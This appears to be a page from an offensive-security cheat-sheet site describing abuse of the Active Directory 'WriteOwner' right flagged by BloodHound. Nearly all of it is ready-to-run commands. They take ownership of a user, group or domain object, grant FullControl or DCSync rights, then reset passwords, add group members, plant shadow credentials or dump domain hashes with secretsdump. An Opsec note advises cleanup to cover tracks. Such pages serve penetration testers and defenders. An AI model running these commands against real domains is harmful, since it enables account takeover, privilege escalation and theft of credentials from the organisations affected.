🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🩸 BloodHound / WriteOwner

WriteOwner

Source can change the owner of the target object; as owner, source gains implicit WriteDacl and can grant itself any right

Applies to: User/Group/Computer β†’ User, Group, Computer, Domain, GPO

Linux Abuse

Step 1: Change owner to attacker account

owneredit.py -action write -new-owner '<username>' \
    -target '<target-user>' \
    '<domain>/<username>:<password>' -dc-ip <dc-ip>

Step 2: Grant self FullControl (now that we own it)

dacledit.py -action write -rights FullControl \
    -principal <username> \
    -target-dn 'CN=<target-user>,CN=Users,DC=<domain>,DC=<tld>' \
    '<domain>/<username>:<password>' -dc-ip <dc-ip>

Step 3: Exploit β€” example: reset target user's password

bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> set password <target-user> '<new-password>'

Step 3 alt: shadow credentials

certipy-ad shadow auto -u <username>@<domain> -p '<password>' -account <target-user> -dc-ip <dc-ip>

Target: Group β€” take ownership then add self

owneredit.py -action write -new-owner '<username>' -target '<target-group>' \
    '<domain>/<username>:<password>' -dc-ip <dc-ip>

dacledit.py -action write -rights FullControl -principal <username> \
    -target-dn 'CN=<target-group>,CN=Users,DC=<domain>,DC=<tld>' \
    '<domain>/<username>:<password>' -dc-ip <dc-ip>

bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> add groupMember '<target-group>' '<username>'

Target: Domain β€” take ownership then DCSync

owneredit.py -action write -new-owner '<username>' -target '<domain>' \
    '<domain>/<username>:<password>' -dc-ip <dc-ip>

dacledit.py -action write -rights DCSync -principal <username> \
    -target-dn 'DC=<domain>,DC=<tld>' \
    '<domain>/<username>:<password>' -dc-ip <dc-ip>

secretsdump.py '<domain>/<username>:<password>' -dc-ip <dc-ip>

Windows Abuse

Step 1: Take ownership

Set-DomainObjectOwner -Identity '<target-user>' -OwnerIdentity '<username>' -Credential $cred

Step 2: Grant FullControl

Add-DomainObjectAcl -TargetIdentity '<target-user>' -PrincipalIdentity '<username>' -Rights All -Credential $cred

Step 3: Exploit

# Reset password
Set-DomainUserPassword -Identity <target-user> -AccountPassword (ConvertTo-SecureString '<new-password>' -AsPlainText -Force) -Credential $cred
# Or add to group
Add-DomainGroupMember -Identity '<target-group>' -Members '<username>' -Credential $cred

Opsec

  • Ownership changes are logged in the Security event log (4670) β€” two-step attack (change owner, then grant DACL) generates two entries
  • Clean up: restore original owner after exploitation if persistence is not needed